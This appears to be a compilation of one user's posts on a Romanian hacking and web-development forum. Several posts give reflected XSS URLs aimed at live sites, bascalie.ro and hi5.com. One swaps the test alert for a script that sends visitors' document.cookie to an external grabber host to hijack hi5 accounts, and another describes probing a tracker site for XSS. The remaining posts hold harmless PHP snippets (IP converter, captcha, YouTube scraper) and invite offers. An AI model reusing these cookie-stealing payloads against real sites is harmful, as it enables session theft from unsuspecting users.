[[xss] bascalie.ro]

http://www.bascalie.ro/cauta/%22%3E%3Cscript%3Ealert%28%2Fxss-by-Addic73d%2F%29%3C%2Fscript%3E

[[xss] hi5]

Alta chestie, acum daca tot am inceput un noob thread, macar sa-mi permit sa continui cu intrebari tampite.

In xss-ul de pe hi5 am inlocuit

"><script>alert(/xss/)</script>

cu

"><script>document.location="http://www.locatiegrabber.0fees.net/grabber.php?cookie=" + document.cookie; </script>

Acum presupun ca in momentul cand accesam link-ul de hi5 combinat cu "><script>document.location... ar fi trebuit sa ma redirectioneze catre grabber, fapt care nu se intampla.

LE:

As fi curios sa stiu cum si-a dat omu seama, pentru experientele viitoare, sa ma feresc de greseli.

[[xss] hi5]

Practic, alaturi de un cookie grabber plus xss-ul catre locatia scriptului nu pot decat sa fur cookie-ul unui amarat de cont hi5....?

[[xss] hi5]

Asta e xss-ul si presupun ca poate fi folosit la obtinerea cookiurilor unui cont de hi5 .. ??

http://hi5.com/friend/gifts/store.do?channel=store_primary_nav%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

Doar presupun, pentru ca momentan nu am ideea cu ce se mananca exploitul de tip XSS.

Acum pe langa toate spuse mai sus am si cateva nelamuriti de genul:

Ownerul unui site poate vedea daca cineva a incercat sa caute exploituri XSS pe site-ul lui si ce poate face in privinta asta, pentru ca, mai devreme am intrat pe tracker-ul iplay.ro sectiune browse si am executat bucata de cod pentru a observa daca este sau nu vulnerabil xss, la care am fost redirectionat pe o pagina in care mi-a fost afisat

Attack detected!

Your attack was blocked:
IP-ul - Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0

Ar mai fi multe intrebari insa momentan ma rezum la cele spuse mai sus, iar daca se considera ca am postat gresit rog un admin/moderator sa-l mute, plus masurile de rigoare.

[geoIP nelamurire...]

Mersi pentru raspunsuri, m-am lamurit cum sta treaba...

Conversia se face dupa formula: 16777216*w + 65536*x + 256*y + z unde IP = w.x.y.z

Am facut si un script simplu..

<?php

echo '<strong>IP converter</strong><br />';
echo "<form name='scan_ip' method='post' action='' >
       IP: <input type='text' name='ip' />
	       <input type='submit' name='calc' value='Hit >>' />
     </form>";

	 if((isset($_POST['calc']) && (empty($_POST['ip'])))) {

	 echo 'An empty field can not be converted.';

	 } else if((isset($_POST['calc']) && (!empty($_POST['ip'])))) {

	 $ip = $_POST['ip'];
	 $div = explode('.', $ip);

	 $w = ($div[0]*16777216);
	 $x = ($div[1]*65536);
	 $y = ($div[2]*256);
	 $z = ($div[3]*1);


	 echo '<strong>'.($w + $x + $y + $z).'</strong>';



	 } 

?>

@Zatarra am incercat si o metoda asemanatoare si de foarte multe ori la oras returneaza 'unknown location'.

[geoIP nelamurire...]

Am gasit un fisier cu lista tarilor si clasele de ip-uri aferente fiecarei tari.

Acum am cateva nelamuriti...

1.0.0.0 1.0.0.255 16777216 16777471 AU Australia

1.0.1.0 1.0.3.255 16777472 16778239 CN China

1.0.4.0 1.0.7.255 16778240 16779263 AU Australia

1.0.8.0 1.0.15.255 16779264 16781311 CN China

1.0.16.0 1.0.31.255 16781312 16785407 JP Japan

1.0.32.0 1.0.63.255 16785408 16793599 CN China

1.0.64.0 1.0.127.255 16793600 16809983 JP Japan

1.0.128.0 1.0.255.255 16809984 16842751 TH Thailand

1.1.0.0 1.1.0.255 16842752 16843007 CN China

1.1.1.0 1.1.1.255 16843008 16843263 AU Australia

1.1.2.0 1.1.63.255 16843264 16859135 CN China

1.1.64.0 1.1.127.255 16859136 16875519 JP Japan

Fisierul arata asa...

Acum am inteles ca, prima coloana reprezinta inceputul clasei, a doua reprezinta sfarsitul clasei, dar ce reprezinta coloanele 3 si 4???

[Invitatii Google Plus]

Mersi albert...

[Am ales bine culorile pentru site?]

interesant captcha

uite un codul pentru captcha daca te gandesti vreodata sa-l schimbi pe al tau:

captcha.php

<?php session_start(); 
//imagecreatefrompng :: create a new image 
//from file or URL
$img = imagecreatefrompng('poze/black.png'); 
//displaying the random text on the captcha 
$numere = rand(100, 999); 
$_SESSION['check'] = ($numere); 
//The function imagecolorallocate creates a 
//color using RGB (red,green,blue) format.
$white = imagecolorallocate($img, 255, 255, 255); 
imagestring($img, 10, 8, 3, $numere, $white);
header ("Content-type: image/png"); imagepng($img); 
?>

ai nevoie de o poza, in cazul nostru black.png de circa 40 x 20 care sa reprezinte background-ul ..

si verificare codului captcha:

if(($_POST['check']) == $_SESSION['check']) {

echo 'Trimite mesaj w/e';

}

unde $_POST['check'] este ceea ce introduce utilizatorul si $_SESSION['check'] este sesiunea definita in captcha.php similara cu numarul de pe imagine.

Este si un tutorial pe net cu acelasi exemplu de unde m-am inspirat si eu, numai ca asta e putin mai simplificat. Acum sper ca nu te-a deranjat raspunsul asta, insa ceea ce ai tu pe site nu aduce a captcha.

Bafta

[Script PHP - GetTrailersFromYoutube]

getTrailersFromYoutube.php

<?php
session_start();
function veziArray($array) {

echo '<pre>';
print_r($array);
echo '</pre>';

}

function xmlstr($string, $start, $end){
        $string = " ".$string;
        $ini = strpos($string,$start);
        if ($ini == 0) return "";
        $ini += strlen($start);   
        $len = strpos($string,$end,$ini) - $ini;
        return substr($string,$ini,$len);
}


$trailereNoi = array('Kung Fu Panda 2', 'John Carter', 'Zookeeper', 'Animals United', 'Magic Trip', 'Crazy, Stupid, Love.', 'Amigo', 'Higher Ground', 'Contagion', 'The Devil\'s Double', 'Friends with Benefits', 'Harry Potter and the Deathly Hallows - Part 2', 'The Pirates! Band of Misfits', 'Hugo', 'Winnie the Pooh');

foreach($trailereNoi as $nume) {
$sursa = file('http://www.youtube.com/results?search_query='.urlencode($nume).'official+trailer+2011+[HD]+&aq=f');
$i = 380;
while($i <= 420) {
$link = $sursa[$i];
$getLink = xmlstr($link, ' <a href="', '"');
$completeLink = 'http://www.youtube.com'.$getLink;

if(strlen($completeLink) == 42) {

// echo "<a href=$completeLink>$nume</a><br />";
echo '<a href="trailer.php?film='.urlencode($nume).'&link='.$getLink.'">'.$nume.'</a><br />';

} 


$i++;
   }
 }

?>

trailer.php

<?php
function veziArray($array) {

echo '<pre>';
print_r($array);
echo '</pre>';

}

function xmlstr($string, $start, $end){
        $string = " ".$string;
        $ini = strpos($string,$start);
        if ($ini == 0) return "";
        $ini += strlen($start);   
        $len = strpos($string,$end,$ini) - $ini;
        return substr($string,$ini,$len);
}

if(isset($_GET['link'])) {
$link = $_GET['link'];
$trailerPage = file_get_contents('http://www.youtube.com'.$link);
$trailer = xmlstr($trailerPage, '<embed type="application/x-shockwave-flash"', 'bgcolor="#000000">');
echo '<embed type="application/x-shockwave-flash"'.$trailer.'bgcolor="#000000">';


}

?>

L-am testet pe localhost si merge foarte bine, cu optiunea ca getTrailersFromYoutube.php se incarca mai greu datorita faptului ca nu am stat sa filtrez continutul in care s-a facut search.

Ideea e ca, in momentul in care verific script-ul din exteriorul localhost-ului, sau il pun pe host in locul trailerului imi apare "Am intampinat o eroare, incercati mai tarziu".

Ceva idei??

[Invitatii Waffles.fm]

Ofer:

- 3 invitatii waffles.fm

- 2 invitatii torrentleech.org a.k.a TL

Cerinte:

- minim 150 posturi pe forum.

- promisiunea ca vei folosi contul.

- de ce vrei invitatia?